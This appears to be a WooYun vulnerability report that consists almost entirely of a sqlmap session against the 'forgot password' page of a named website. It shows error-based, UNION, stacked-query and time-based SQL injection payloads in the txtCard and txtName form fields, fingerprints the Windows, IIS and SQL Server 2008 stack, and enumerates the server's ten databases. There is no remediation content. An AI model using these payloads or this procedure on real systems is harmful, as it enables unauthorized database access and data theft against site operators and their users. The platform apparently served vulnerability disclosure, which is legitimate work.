WooYun.org

点击忘记密码：
漏洞url：http://www.nxyqs.com/RecoverPasswd.aspx

localhost:sqlmap XXXXXXXX$ python sqlmap.py -r nxy.txt --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:58:13
[11:58:13] [INFO] parsing HTTP request from 'nxy.txt'
[11:58:13] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:58:13] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtCard
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: txtName=1&txtCard=1' AND 9152=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(107)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (9152=9152) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(121)+CHAR(113))) AND 'DYxM'='DYxM
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: txtName=1&txtCard=1' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(107)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(87)+CHAR(89)+CHAR(120)+CHAR(119)+CHAR(68)+CHAR(65)+CHAR(107)+CHAR(66)+CHAR(88)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(121)+CHAR(113)-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: txtName=1&txtCard=1'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: txtName=1&txtCard=1' WAITFOR DELAY '0:0:5'--
Place: POST
Parameter: txtName
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: txtName=1''''' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(107)+CHAR(102)+CHAR(113)+CHAR(117)+CHAR(69)+CHAR(65)+CHAR(69)+CHAR(84)+CHAR(90)+CHAR(72)+CHAR(65)+CHAR(89)+CHAR(117)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(121)+CHAR(113)-- &txtCard=d1'''''''''
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: txtName=1'''''; WAITFOR DELAY '0:0:5'--&txtCard=d1'''''''''
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: txtName=1''''' WAITFOR DELAY '0:0:5'--&txtCard=d1'''''''''
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: txtCard, type: Single quoted string (default)
[1] place: POST, parameter: txtName, type: Unescaped numeric
[q] Quit
> 0
[11:58:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[11:58:16] [INFO] fetching database names
[11:58:16] [INFO] the SQL query used returns 10 entries
[11:58:16] [INFO] resumed: "dvbbs8"
[11:58:16] [INFO] resumed: "ecell6"
[11:58:16] [INFO] resumed: "Exam1"
[11:58:16] [INFO] resumed: "master"
[11:58:16] [INFO] resumed: "model"
[11:58:16] [INFO] resumed: "msdb"
[11:58:16] [INFO] resumed: "ReportServer"
[11:58:16] [INFO] resumed: "ReportServerTempDB"
[11:58:16] [INFO] resumed: "sqlnexus"
[11:58:16] [INFO] resumed: "tempdb"
available databases [10]:                                                      
[*] dvbbs8
[*] ecell6
[*] Exam1
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sqlnexus
[*] tempdb